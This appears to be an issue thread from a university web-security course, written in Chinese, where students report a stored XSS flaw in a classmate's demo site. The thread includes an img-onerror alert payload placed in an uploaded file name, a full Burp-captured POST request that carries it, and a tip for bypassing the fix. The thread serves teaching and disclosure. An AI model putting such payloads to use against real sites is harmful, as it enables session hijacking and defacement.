fei3363
commented
2 years ago @B10704118 請給我 brup 的 POC (封包內容)
Open M11115015 opened 2 years ago
fei3363
commented
2 years ago @B10704118 請給我 brup 的 POC (封包內容)
M11115015
commented
2 years ago @fei3363 請問像這樣嗎?
Poc:
<img src='' onerror=\"alert(777)\">@B10704118
把這個文字複製出來~
M11115015
commented
2 years ago @fei3363 不過我看他好像又修好了 修超快XD
fei3363
commented
2 years ago @B10704118 那我又上 tag @ken123183 一樣有異議可上訴
M11115015
commented
2 years ago @fei3363 好像又可以了 把alert內容改掉或者在<img前面加上a> ‵‵‵‵‵‵ POST /post.php HTTP/1.1 Host: demo.ken123183.social Cookie: PHPSESSID=34d0eb7cd7fb1e0bd14edbb2bc7e08cd Content-Length: 344 Cache-Control: max-age=0 Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://demo.ken123183.social Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRi3IdvrKAXQGLfDZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://demo.ken123183.social/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close
------WebKitFormBoundaryRi3IdvrKAXQGLfDZ Content-Disposition: form-data; name="context"
555 ------WebKitFormBoundaryRi3IdvrKAXQGLfDZ Content-Disposition: form-data; name="file"; filename="<img src='' onerror=\"alert(test)\">" Content-Type: text/plain
123 1651651651561 651651561561 561651 651651 56165 165 1652
------WebKitFormBoundaryRi3IdvrKAXQGLfDZ-- ‵‵‵‵
攻擊者學號:B10704118 @B10704118 被攻擊者學號與網址:B10815022 @ken123183 https://demo.ken123183.social/index.php
漏洞類型:XSS(filename)
漏洞描述 利用burp suit上傳名為<img src='' onerror=\"alert(12)\">的檔案,每次alert內容要輸入不一樣,不然會判定已存在此檔案,如圖
Poc: <img src='' onerror=\"alert(12)\">